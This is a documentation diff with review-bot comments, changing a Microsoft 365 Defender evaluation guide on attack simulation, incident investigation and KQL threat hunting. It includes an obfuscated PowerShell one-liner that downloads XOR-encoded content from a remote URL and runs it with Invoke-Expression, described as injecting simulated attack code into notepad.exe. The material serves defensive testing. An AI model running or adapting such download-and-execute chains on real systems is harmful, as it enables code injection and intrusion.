+ - The test domain controller to [Microsoft Defender for Identity](https://docs.microsoft.com/azure/security-center/security-center-wdatp) and enable [remote management](https://docs.microsoft.com/windows-server/administration/server-manager/configure-remote-management-in-server-manager).
+ - Verify that [Microsoft Defender for Identity and Microsoft Cloud App Security integration](https://docs.microsoft.com/cloud-app-security/mdi-integration) have been enabled.
+ - A test user is created on your domain ΓÇô no admin permissions needed.
-3. Verify test device configuration:
-
- 1. Device runs with Windows 10 version 1903 or a later version.
-
- 1. Test device is joined to the test domain.
-
- 1. [Turn on Windows Defender Antivirus](https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Windows Defender Antivirus, see this [troubleshooting topic](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
-
- 1. Verify that the test device is [onboarded to Microsoft Defender for Endpoint)](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
+3. Verify test device configuration:
-If you use an existing tenant and implement device groups, create a dedicated device group for the test device and push it to top level in configuration UX.
+ 1. Device runs with Windows 10 version 1903 or a later version.
+
+ 1. Test device is joined to the test domain.
+ 1. [Turn on Windows Defender Antivirus](https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Windows Defender Antivirus, see this [troubleshooting topic](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
+
+ 1. Verify that the test device is [onboarded to Microsoft Defender for Endpoint)](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
+
+If you use an existing tenant and implement device groups, create a dedicated device group for the test device and push it to top level in configuration UX.
-## Run the simulation
+## Run the attack scenario simulation
To run the attack scenario simulation:
-1. Log in to the test device with the test user account.
+1. Log in to the test device with the test user account.
-2. Open a Windows PowerShell window on the test device.
+2. Open a Windows PowerShell window on the test device.
-3. Copy the following simulation script:
+3. Copy the following simulation script:
- ```powershell
- [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$xor
- = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');$base64String = (Invoke-WebRequest -URI "https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
- -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
- $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
- $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
- ```
-
- > [!NOTE]
- > If you open this document on a web browser, you might encounter problems copying the full text without losing certain characters or introducing extra line breaks. Download this document and open it on Adobe Reader.
+ ```powershell
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$xor
+ = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');$base64String = (Invoke-WebRequest -URI "https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
+ -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
+ $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
+ $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
+ ```
+
+ > [!NOTE]
+ > If you open this document on a web browser, you might encounter problems copying the full text without losing certain characters or introducing extra line breaks. Download this document and open it on Adobe Reader.
4. At the prompt, paste and run the copied script.
->[!NOTE]
->If you're running PowerShell using remote desktop protocol (RDP), use the Type Clipboard Text command in the RDP client because the **CTRL-V** hotkey or right-click-paste method might not work. Recent versions of PowerShell sometimes will also not accept that method, you might have to copy to Notepad in memory first, copy it in the virtual machine, and then paste it into PowerShell.
+> [!NOTE]
+> If you're running PowerShell using remote desktop protocol (RDP), use the Type Clipboard Text command in the RDP client because the **CTRL-V** hotkey or right-click-paste method might not work. Recent versions of PowerShell sometimes will also not accept that method, you might have to copy to Notepad in memory first, copy it in the virtual machine, and then paste it into PowerShell.
A few seconds later, <i>notepad.exe</i> will open. A simulated attack code will be injected into notepad.exe. Keep the automatically generated Notepad instance open to experience the full scenario.
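Review bot: the simulation script on the `+` side is still split mid-statement: one line ends with `$xor`, the next begins with `= [System.Text.Encoding]::UTF8.GetBytes(...)`, and `-UseBasicParsing` sits on its own line, away from `Invoke-WebRequest`. Pasted as shown, those breaks can stop PowerShell from parsing the command, which is the copy problem the note under the script warns about; keep each statement on one line or break only after a `;`. In the same hunk, the domain controller bullet "The test domain controller to [Microsoft Defender for Identity]" has no verb and its link path is `security-center-wdatp`, so both the wording and the target need confirming. The link text "onboarded to Microsoft Defender for Endpoint)" keeps a stray `)`. The added lines also still contain `deviceΓÇöthey` and `domain ΓÇô no admin`, the same encoding damage this change removes elsewhere.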
@@ -104,31 +102,29 @@ The simulated attack code will attempt to communicate to an external IP address
You'll see a message displayed on the PowerShell console when this script completes. ```console
-ran NetSessionEnum against [DC Name] with return code result 0
+ran NetSessionEnum against [DC Name] with return code result 0
``` To see the Automated Incident and Response feature in action, keep the notepad.exe process open. You'll see Automated Incident and Response stop the Notepad process. - ## Investigate an incident
->[!NOTE]
->Before we walk you through this simulation, watch the following video to see how incident management helps you piece the related alerts together as part of the investigation process, where you can find it in the portal, and how it can help you in your security operations:
+> [!NOTE]
+> Before we walk you through this simulation, watch the following video to see how incident management helps you piece the related alerts together as part of the investigation process, where you can find it in the portal, and how it can help you in your security operations:
->[!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bzwz?]
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bzwz?]
-Switching to the SOC analyst point of view, you can now start to investigate the attack in the Microsoft 365 Security Center portal.
+Switching to the SOC analyst point of view, you can now start to investigate the attack in the Microsoft 365 Security Center portal.
-1. Open the [Microsoft 365 Security Center portal](https://security.microsoft.com/incidents) incident queue from any device.
+1. Open the [Microsoft 365 Security Center portal](https://security.microsoft.com/incidents) incident queue from any device.
-2. Navigate to **Incidents** from the menu.
+2. Navigate to **Incidents** from the menu.
- ![Screenshot of incidents as shown on the Microsoft 365 Security CenterΓÇÖs left-hand side menu](../../media/mtp/fig1.png)
+ ![Screenshot of incidents as shown on the Microsoft 365 Security Center's left-hand side menu](../../media/mtp/fig1.png)
-3. The new incident for the simulated attack will appear in the incident queue.
-
- ![Screenshot of the incident queue](../../media/mtp/fig2.png)
+3. The new incident for the simulated attack will appear in the incident queue.
+ ![Screenshot of the incident queue](../../media/mtp/fig2.png)
### Investigate the attack as a single incident
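Review bot: the context paragraph after the console output names the feature "Automated Incident and Response" twice, while the article's introduction and its later section heading call it automated investigation and remediation; since this hunk already touches the surrounding lines, align the name so readers can find the matching section and portal tab. The sample output line `ran NetSessionEnum against [DC Name] with return code result 0` would also benefit from one sentence saying what to do when the return code is not 0, because the investigation steps that follow assume the enumeration reached the domain controller.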
@@ -138,47 +134,44 @@ The alerts generated during this simulation are associated with the same threat,
To view the incident:
-1. Navigate to the **Incidents** queue.
-
- ![Screenshot of incidents from the navigation menu](../../media/mtp/fig1.png)
+1. Navigate to the **Incidents** queue.
-2. Select the newest item by clicking on the circle located left of the incident name. A side panel displays additional information about the incident, including all the related alerts. Each incident has a unique name that describes it based on the attributes of the alerts it includes.
+ ![Screenshot of incidents from the navigation menu](../../media/mtp/fig1.png)
- ![Screenshot of the incidents page where generated alerts are aggregated during the simulation](../../media/mtp/fig4.png)
+2. Select the newest item by clicking on the circle located left of the incident name. A side panel displays additional information about the incident, including all the related alerts. Each incident has a unique name that describes it based on the attributes of the alerts it includes.
- The alerts that show in the dashboard can be filtered based on service resources: Microsoft Defender for Identity, Microsoft Cloud App Security, Microsoft Defender for Endpoint, Microsoft 365 Defender, and Microsoft Defender for Office 365.
+ ![Screenshot of the incidents page where generated alerts are aggregated during the simulation](../../media/mtp/fig4.png)
-3. Select **Open incident page** to get more information about the incident.
+ The alerts that show in the dashboard can be filtered based on service resources: Microsoft Defender for Identity, Microsoft Cloud App Security, Microsoft Defender for Endpoint, Microsoft 365 Defender, and Microsoft Defender for Office 365.
- In the **Incident** page, you can see all the alerts and information related to the incident. The information includes the entities and assets that are involved in the alert, the detection source of the alerts (Microsoft Defender for Identity, EDR), and the reason they were linked together. Reviewing the incident alert list shows the progression of the attack. From this view, you can see and investigate the individual alerts.
+3. Select **Open incident page** to get more information about the incident.
- You can also click **Manage incident** from the right-hand menu, to tag the incident, assign it to yourself, and add comments.
+ In the **Incident** page, you can see all the alerts and information related to the incident. The information includes the entities and assets that are involved in the alert, the detection source of the alerts (Microsoft Defender for Identity, EDR), and the reason they were linked together. Reviewing the incident alert list shows the progression of the attack. From this view, you can see and investigate the individual alerts.
- ![Screenshot of where to click Manage incident](../../media/mtp/fig5a.png)
+ You can also click **Manage incident** from the right-hand menu, to tag the incident, assign it to yourself, and add comments.
- ![Screenshot of the fields on the manage incident panel where you can tag the incident, assign it to yourself, and add comments ](../../media/mtp/fig5b.png)
+ ![Screenshot of where to click Manage incident](../../media/mtp/fig5a.png)
+ ![Screenshot of the fields on the manage incident panel where you can tag the incident, assign it to yourself, and add comments ](../../media/mtp/fig5b.png)
-### Review generated alerts
+### Review generated alerts
-LetΓÇÖs look at some of the alerts generated during the simulated attack.
+Let's look at some of the alerts generated during the simulated attack.
->[!NOTE]
->WeΓÇÖll walk through only a few of the alerts generated during the simulated attack. Depending on the version of Windows and the Microsoft 365 Defender products running on your test device, you might see more alerts that appear in a slightly different order.
+> [!NOTE]
+> We'll walk through only a few of the alerts generated during the simulated attack. Depending on the version of Windows and the Microsoft 365 Defender products running on your test device, you might see more alerts that appear in a slightly different order.
-![Screenshot of generated alerts](../../media/mtp/fig6.png)
+![Screenshot of generated alerts](../../media/mtp/fig6.png)
-
-**Alert: Suspicious process injection observed (Source: Microsoft Defender for Endpoint EDR)**
+#### Alert: Suspicious process injection observed (Source: Microsoft Defender for Endpoint EDR)
Advanced attackers use sophisticated and stealthy methods to persist in memory and hide from detection tools. One common technique is to operate from within a trusted system process rather than a malicious executable, making it hard for detection tools and security operations to spot the malicious code. To allow the SOC analysts to catch these advanced attacks, deep memory sensors in Microsoft Defender for Endpoint provide our cloud service with unprecedented visibility into a variety of cross-process code injection techniques. The following figure shows how Defender for Endpoint detected and alerted on the attempt to inject code to <i>notepad.exe</i>.
-![Screenshot of the alert for injection of potentially malicious code](../../media/mtp/fig7.png)
-
+![Screenshot of the alert for injection of potentially malicious code](../../media/mtp/fig7.png)
-**Alert: Unexpected behavior observed by a process run with no command-line arguments (Source: Microsoft Defender for Endpoint EDR)**
+#### Alert: Unexpected behavior observed by a process run with no command-line arguments (Source: Microsoft Defender for Endpoint EDR)
Microsoft Defender for Endpoint detections often target the most common attribute of an attack technique. This method ensures durability and raises the bar for attackers to switch to newer tactics.
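Review bot: in the "Open incident page" step the detection sources are given as "(Microsoft Defender for Identity, EDR)", while the filter list two paragraphs earlier and the new alert headings spell out "Microsoft Defender for Endpoint"; use the product name in both places so the source shown in the portal can be matched to the text. Promoting the alert titles from bold text to `####` headings also puts the whole "(Source: Microsoft Defender for Endpoint EDR)" string into each heading anchor; consider moving the source to the first line under the heading. Minor: the fig5b alt text ends with a trailing space before `]`.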
@@ -186,36 +179,35 @@ We employ large-scale learning algorithms to establish the normal behavior of co
For this scenario, the process <i>notepad.exe</i> is exhibiting abnormal behavior, involving communication with an external location. This outcome is independent of the specific method used to introduce and execute the malicious code.
->[!NOTE]
->Because this alert is based on machine-learning models that require additional backend processing, it might take some time before you see this alert in the portal.
+> [!NOTE]
+> Because this alert is based on machine-learning models that require additional backend processing, it might take some time before you see this alert in the portal.
Notice that the alert details include the external IP addressΓÇöan indicator that you can use as a pivot to expand investigation. Select the IP address in the alert process tree to view the IP address details page.
-![Screenshot of the alert for unexpected behavior by a process run with no command line arguments](../../media/mtp/fig8.png)
+![Screenshot of the alert for unexpected behavior by a process run with no command line arguments](../../media/mtp/fig8.png)
The following figure displays the selected IP Address details page (clicking on IP address in the Alert process tree). ![Screenshot of the IP address details page](../../media/mtp/fig9.png) -
-**Alert: User and IP address reconnaissance (SMB) (Source: Microsoft Defender for Identity)**
+#### Alert: User and IP address reconnaissance (SMB) (Source: Microsoft Defender for Identity)
Enumeration using Server Message Block (SMB) protocol enables attackers to get recent user logon information that helps them move laterally through the network to access a specific sensitive account. In this detection, an alert is triggered when the SMB session enumeration runs against a domain controller.
-![Screenshot of the Microsoft Defender for Identity alert for User and IP address reconnaissance](../../media/mtp/fig10.png)
-
+![Screenshot of the Microsoft Defender for Identity alert for User and IP address reconnaissance](../../media/mtp/fig10.png)
### Review the device timeline [Microsoft Defender for Endpoint]+ After exploring the various alerts in this incident, navigate back to the incident page you investigated earlier. Select the **Devices** tab in the incident page to review the devices involved in this incident as reported by Microsoft Defender for Endpoint and Microsoft Defender for Identity. Select the name of the device where the attack was conducted, to open the entity page for that specific device. In that page, you can see alerts that were triggered and related events. Select the **Timeline** tab to open the device timeline and view all events and behaviors observed on the device in chronological order, interspersed with the alerts raised.
-![Screenshot of the device timeline with behaviors](../../media/mtp/fig11.png)
+![Screenshot of the device timeline with behaviors](../../media/mtp/fig11.png)
Expanding some of the more interesting behaviors provides useful details, such as process trees.
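Review bot: the unchanged line "Notice that the alert details include the external IP addressΓÇöan indicator" still carries the garbled dash that this commit cleans up in other paragraphs, so it should be fixed in the same pass. The figure sentence "displays the selected IP Address details page (clicking on IP address in the Alert process tree)" repeats the instruction given just before the fig8 screenshot and capitalizes "IP Address" and "Alert" inconsistently with that sentence; one of the two can be dropped.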
@@ -225,35 +217,36 @@ For example, scroll down until you find the alert event **Suspicious process inj
### Review the user information [Microsoft Cloud App Security]
-On the incident page, select the **Users** tab to display the list of users involved in the attack. The table contains additional information about each user, including each userΓÇÖs **Investigation Priority** score.
+On the incident page, select the **Users** tab to display the list of users involved in the attack. The table contains additional information about each user, including each user's **Investigation Priority** score.
-Select the user name to open the userΓÇÖs profile page where further investigation can be conducted. [Read more about investigating risky users](https://docs.microsoft.com/cloud-app-security/tutorial-ueba#identify).
-<br>
-![Screenshot of Cloud App Security user page](../../media/mtp/fig13.png)
+Select the user name to open the user's profile page where further investigation can be conducted. [Read more about investigating risky users](https://docs.microsoft.com/cloud-app-security/tutorial-ueba#identify).
+![Screenshot of Cloud App Security user page](../../media/mtp/fig13.png)
## Automated investigation and remediation
->[!NOTE]
+
+> [!NOTE]
>Before we walk you through this simulation, watch the following video to get familiar with what automated self-healing is, where to find it in the portal, and how it can help in your security operations:
->[!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4BzwB]
+> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4BzwB]
Navigate back to the incident in the Microsoft 365 Security Center portal. The **Investigations** tab in the **Incident** page shows the automated investigations that were triggered by Microsoft Defender for Identity and Microsoft Defender for Endpoint. The screenshot below displays only the automated investigation triggered by Defender for Endpoint. By default, Defender for Endpoint automatically remediates the artifacts found in the queue, which requires remediation. ![Screenshot of automated investigations related to the incident](../../media/mtp/fig14.png)
-Select the alert that triggered an investigation to open the **Investigation details** page. YouΓÇÖll see the following details:
+Select the alert that triggered an investigation to open the **Investigation details** page. You'll see the following details:
+ - Alert(s) that triggered the automated investigation. - Impacted users and devices. If indicators are found on additional devices, these additional devices will be listed as well. - List of evidence. The entities found and analyzed, such as files, processes, services, drivers, and network addresses. These entities are analyzed for possible relationships to the alert and rated as benign or malicious. - Threats found. Known threats that are found during the investigation.
->[!NOTE]
->Depending on timing, the automated investigation might still be running. Wait a few minutes for the process to complete before you collect and analyze the evidence and review the results. Refresh the **Investigation details** page to get the latest findings.
+> [!NOTE]
+> Depending on timing, the automated investigation might still be running. Wait a few minutes for the process to complete before you collect and analyze the evidence and review the results. Refresh the **Investigation details** page to get the latest findings.
![Screenshot of Investigation details page](../../media/mtp/fig15.png)
-During the automated investigation, Microsoft Defender for Endpoint identified the notepad.exe process, which was injected as one of the artifacts requiring remediation. Defender for Endpoint automatically stops the suspicious process injection as part of the automated remediation.
+During the automated investigation, Microsoft Defender for Endpoint identified the notepad.exe process, which was injected as one of the artifacts requiring remediation. Defender for Endpoint automatically stops the suspicious process injection as part of the automated remediation.
You can see <i>notepad.exe</i> disappear from the list of running processes on the test device.
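Review bot: under "Automated investigation and remediation" the marker becomes `> [!NOTE]`, but the next line is left as `>Before we walk you through this simulation` with no space after `>`, so the note block is now formatted two ways; apply the same `> ` prefix to that line. The rewritten sentence "identified the notepad.exe process, which was injected as one of the artifacts requiring remediation" reads as if the process was injected as an artifact; "identified the injected notepad.exe process as one of the artifacts requiring remediation" says what the investigation page shows. The context sentence "remediates the artifacts found in the queue, which requires remediation" has the same agreement problem.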
@@ -265,192 +258,190 @@ Select **Manage incident**. Set the status to **Resolve incident** and select th
When the incident is resolved, it closes all of the associated alerts in Microsoft 365 Security Center and in the related portals.
-![Screenshot of the incidents page with the open Manage incident panel where you can click the switch to resolve incident](../../media/mtp/fig16.png)
+![Screenshot of the incidents page with the open Manage incident panel where you can click the switch to resolve incident](../../media/mtp/fig16.png)
-<br>
-This wraps up the attack simulation for the incident management and automated investigation and remediation scenarios. The next simulation will take you through proactive threat hunting for potentially malicious files.
+This wraps up the attack simulation for the incident management and automated investigation and remediation scenarios. The next simulation will take you through proactive threat hunting for potentially malicious files.
## Advanced hunting scenario
->[!NOTE]
->Before we walk you through the simulation, watch the following video to understand the advanced hunting concepts, see where you can find it in the portal, and know how it can help you in your security operations:
+> [!NOTE]
+> Before we walk you through the simulation, watch the following video to understand the advanced hunting concepts, see where you can find it in the portal, and know how it can help you in your security operations:
->[!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bp7O]
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bp7O]
### Hunting environment requirements+ There's a single internal mailbox and device required for this scenario. You'll also need an external email account to send the test message.
-1. Verify that your tenant has [enabled Microsoft 365 Defender](https://docs.microsoft.com/microsoft-365/security/mtp/mtp-enable#starting-the-service).
-2. Identify a target mailbox to be used for receiving email.
- a. This mailbox must be monitored by Microsoft Defender for Office 365
- b. The device from requirement 3 needs to access this mailbox
-3. Configure a test device:
- a. Make sure you are using Windows 10 version 1903 or later version.
- b. Join the test device to the test domain.
- c. [Turn on Windows Defender Antivirus](https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Windows Defender Antivirus, see [this troubleshooting topic](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
- d. [Onboard to Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
+1. Verify that your tenant has [enabled Microsoft 365 Defender](https://docs.microsoft.com/microsoft-365/security/mtp/mtp-enable#starting-the-service).
+2. Identify a target mailbox to be used for receiving email.
+ a. This mailbox must be monitored by Microsoft Defender for Office 365
+ b. The device from requirement 3 needs to access this mailbox
+3. Configure a test device:
+ a. Make sure you are using Windows 10 version 1903 or later version.
+ b. Join the test device to the test domain.
+ c. [Turn on Windows Defender Antivirus](https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Windows Defender Antivirus, see [this troubleshooting topic](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
+ d. [Onboard to Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
### Run the simulation
-1. From an external email account, send an email to the mailbox identified in step 2 of the test environment requirements section. Include an attachment that will be allowed through any existing email filter policies. This file does not need to be malicious or an executable. Suggested file types are <i>.pdf</i>, <i>.exe</i> (if allowed), or Office document such as a Word file.
-2. Open the sent email from the device configured as defined in step 3 of the test environment requirements section. Either open the attachment or save the file to the device.
+1. From an external email account, send an email to the mailbox identified in step 2 of the test environment requirements section. Include an attachment that will be allowed through any existing email filter policies. This file does not need to be malicious or an executable. Suggested file types are <i>.pdf</i>, <i>.exe</i> (if allowed), or Office document such as a Word file.
+2. Open the sent email from the device configured as defined in step 3 of the test environment requirements section. Either open the attachment or save the file to the device.
-**Go hunting**
-1. Open the security.microsoft.com portal.
+#### Go hunting
-2. Navigate to **Hunting > Advanced hunting**.
+1. Open the security.microsoft.com portal.
- ![Screenshot of advanced hunting in the M365 Security Center portal navigation bar](../../media/mtp/fig17.png)
+2. Navigate to **Hunting > Advanced hunting**.
-3. Build a query that starts by gathering email events.
+ ![Screenshot of advanced hunting in the M365 Security Center portal navigation bar](../../media/mtp/fig17.png)
- 1. From the query pane, select New.
-
- 1. Double-click on the EmailEvents table from the schema.
+3. Build a query that starts by gathering email events.
- ```
- EmailEvents
- ```
+ 1. From the query pane, select New.
- 1. Change the time frame to the last 24 hours. Assuming the email you sent when you ran the simulation above was in the past 24 hours, otherwise change the time frame.
-
- ![Screenshot of where you can change the time frame. Open the drop-down menu to choose from range of time frame options](../../media/mtp/fig18.png)
+ 1. Double-click on the EmailEvents table from the schema.
- 1. Run the query. You may have many results depending on the environment for the pilot.
+ ```console
+ EmailEvents
+ ```
- > [!NOTE]
- > See the next step for filtering options to limit data return.
+ 1. Change the time frame to the last 24 hours. Assuming the email you sent when you ran the simulation above was in the past 24 hours, otherwise change the time frame.
+
+ ![Screenshot of where you can change the time frame. Open the drop-down menu to choose from range of time frame options](../../media/mtp/fig18.png)
+
+ 1. Run the query. You may have many results depending on the environment for the pilot.
- ![Screenshot of the advanced hunting query results](../../media/mtp/fig19.png)
+ > [!NOTE]
+ > See the next step for filtering options to limit data return.
+
+ ![Screenshot of the advanced hunting query results](../../media/mtp/fig19.png)
> [!NOTE]
- > Advanced hunting displays query results as tabular data. You can also opt to view the data in other format types such as charts.
+ > Advanced hunting displays query results as tabular data. You can also opt to view the data in other format types such as charts.
- 1. Look at the results and see if you can identify the email you opened. It may take up to 2 hours for the message to show up in advanced hunting. If the email environment is large and there are many results, you might want to use the **Show Filters option** to find the message.
+ 1. Look at the results and see if you can identify the email you opened. It may take up to 2 hours for the message to show up in advanced hunting. If the email environment is large and there are many results, you might want to use the **Show Filters option** to find the message.
- In the sample, the email was sent from a Yahoo account. Click the **+** icon beside **yahoo.com** under the SenderFromDomain section and then click **Apply** to add the selected domain to the query. Use the domain or email account that was used to send the test message in step 1 of Run the Simulation to filter your results. Run the query again to get a smaller result set to verify that you see the message from the simulation.
-
- ![Screenshot of the filters. Use filters to narrow down the search, and find what youΓÇÖre looking for faster.](../../media/mtp/fig20.png)
+ In the sample, the email was sent from a Yahoo account. Click the **+** icon beside **yahoo.com** under the SenderFromDomain section and then click **Apply** to add the selected domain to the query. Use the domain or email account that was used to send the test message in step 1 of Run the Simulation to filter your results. Run the query again to get a smaller result set to verify that you see the message from the simulation.
- ```console
- EmailEvents
- | where SenderMailFromDomain == "yahoo.com"
- ```
+ ![Screenshot of the filters. Use filters to narrow down the search, and find what you're looking for faster.](../../media/mtp/fig20.png)
- 1. Click the resulting rows from the query so you can inspect the record.
-
- ![Screenshot of the inspect record side panel which opens up when an advanced hunting result is selected](../../media/mtp/fig21.png)
+ ```console
+ EmailEvents
+ | where SenderMailFromDomain == "yahoo.com"
+ ```
-4. Now that you have verified that you can see the email, add a filter for the attachments. Focus on all emails with attachments in the environment. For this scenario, focus on inbound emails, not those that are being sent out from your environment. Remove any filters you have added to locate your message and add ΓÇ£| where **AttachmentCount > 0** and **EmailDirection** == **ΓÇ£InboundΓÇ¥ΓÇ¥**
+ 1. Click the resulting rows from the query so you can inspect the record.
- The following query will show you the result with a shorter list than your initial query for all email events:
+ ![Screenshot of the inspect record side panel which opens up when an advanced hunting result is selected](../../media/mtp/fig21.png)
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
+4. Now that you have verified that you can see the email, add a filter for the attachments. Focus on all emails with attachments in the environment. For this scenario, focus on inbound emails, not those that are being sent out from your environment. Remove any filters you have added to locate your message and add "| where **AttachmentCount > 0** and **EmailDirection** == **"Inbound""**
- ```
+ The following query will show you the result with a shorter list than your initial query for all email events:
-5. Next, include the information about the attachment (such as: file name, hashes) to your result set. To do so, join the **EmailAttachmentInfo** table. The common fields to use for joining, in this case are **NetworkMessageId** and **RecipientObjectId**.
+ ```console
+ EmailEvents
+ | where AttachmentCount > 0 and EmailDirection == "Inbound"
+ ```
- The following query also includes an additional line ΓÇ£| **project-rename EmailTimestamp=Timestamp**ΓÇ¥ that'll help identify which timestamp was related to the email versus timestamps related to file actions that you'll add in the next step.
+5. Next, include the information about the attachment (such as: file name, hashes) to your result set. To do so, join the **EmailAttachmentInfo** table. The common fields to use for joining, in this case are **NetworkMessageId** and **RecipientObjectId**.
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
- | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- ```
+ The following query also includes an additional line "| **project-rename EmailTimestamp=Timestamp**" that'll help identify which timestamp was related to the email versus timestamps related to file actions that you'll add in the next step.
-6. Next, use the **SHA256** value from the **EmailAttachmentInfo** table to find **DeviceFileEvents** (file actions that happened on the endpoint) for that hash. The common field here will be the SHA256 hash for the attachment.
+ ```console
+ EmailEvents
+ | where AttachmentCount > 0 and EmailDirection == "Inbound"
+ | project-rename EmailTimestamp=Timestamp
+ | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
+ ```
- The resulting table now includes details from the endpoint (Microsoft Defender for Endpoint) such as device name, what action was done (in this case, filtered to only include FileCreated events), and where the file was stored. The account name associated with the process will also be included.
+6. Next, use the **SHA256** value from the **EmailAttachmentInfo** table to find **DeviceFileEvents** (file actions that happened on the endpoint) for that hash. The common field here will be the SHA256 hash for the attachment.
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
- | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- | join DeviceFileEvents on SHA256
- | where ActionType == "FileCreated"
- ```
+ The resulting table now includes details from the endpoint (Microsoft Defender for Endpoint) such as device name, what action was done (in this case, filtered to only include FileCreated events), and where the file was stored. The account name associated with the process will also be included.
-You've now created a query that'll identify all inbound emails where the user opened or saved the attachment. You can also refine this query to filter for specific sender domains, file sizes, file types, and so on.
+ ```console
+ EmailEvents
+ | where AttachmentCount > 0 and EmailDirection == "Inbound"
+ | project-rename EmailTimestamp=Timestamp
+ | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
+ | join DeviceFileEvents on SHA256
+ | where ActionType == "FileCreated"
+ ```
-7. Functions are a special kind of join, which let you pull more TI data about a file like its prevalence, signer and issuer info, etc. To get more details on the file, use the **FileProfile()** function enrichment:
+ You've now created a query that'll identify all inbound emails where the user opened or saved the attachment. You can also refine this query to filter for specific sender domains, file sizes, file types, and so on.
+
+7. Functions are a special kind of join, which let you pull more TI data about a file like its prevalence, signer and issuer info, etc. To get more details on the file, use the **FileProfile()** function enrichment:
```console
- EmailEvents
+ EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
+ | project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- | join DeviceFileEvents on SHA256
+ | join DeviceFileEvents on SHA256
| where ActionType == "FileCreated" | distinct SHA1 | invoke FileProfile() ```
+#### Create a detection
-**Create a detection**
-
-Once you have created a query that identifies information that you'd like to **get alerted** about if they happen in the future, you can create a custom detection from the query.
+Once you have created a query that identifies information that you'd like to **get alerted** about if they happen in the future, you can create a custom detection from the query.
Custom detections will run the query according to the frequency you set, and the results of the queries will create security alerts, based on the impacted assets you choose. Those alerts will be correlated to incidents and can be triaged as any other security alert generated by one of the products.
-1. On the query page, remove lines 7 and 8 that were added in step 7 of the Go hunting instructions and click **Create detection rule**.
-
- ![Screenshot of where you can click create detection rule in the the advanced hunting page](../../media/mtp/fig22.png)
+1. On the query page, remove lines 7 and 8 that were added in step 7 of the Go hunting instructions and click **Create detection rule**.
+
+ ![Screenshot of where you can click create detection rule in the the advanced hunting page](../../media/mtp/fig22.png)
- > [!NOTE]
- > If you click **Create detection rule** and you have syntax errors in your query, your detection rule wonΓÇÖt be saved. Double-check your query to ensure thereΓÇÖs no errors.
+ > [!NOTE]
+ > If you click **Create detection rule** and you have syntax errors in your query, your detection rule won't be saved. Double-check your query to ensure there's no errors.
+2. Fill in the required fields with the information that will allow the security team to understand the alert, why it was generated, and what actions you expect them to take.
-2. Fill in the required fields with the information that will allow the security team to understand the alert, why it was generated, and what actions you expect them to take.
+ ![Screenshot of the create detection rule page where you can define the alert details](../../media/mtp/fig23.png)
- ![Screenshot of the create detection rule page where you can define the alert details](../../media/mtp/fig23.png)
+ Ensure that you fill out the fields with clarity to help give the next user an informed decision about this detection rule alert
- Ensure that you fill out the fields with clarity to help give the next user an informed decision about this detection rule alert
+3. Select what entities are impacted in this alert. In this case, select **Device** and **Mailbox**.
-3. Select what entities are impacted in this alert. In this case, select **Device** and **Mailbox**.
+ ![Screenshot of the create detection rule page where you can choose the parameters of the impacted entities](../../media/mtp/fig24.png)
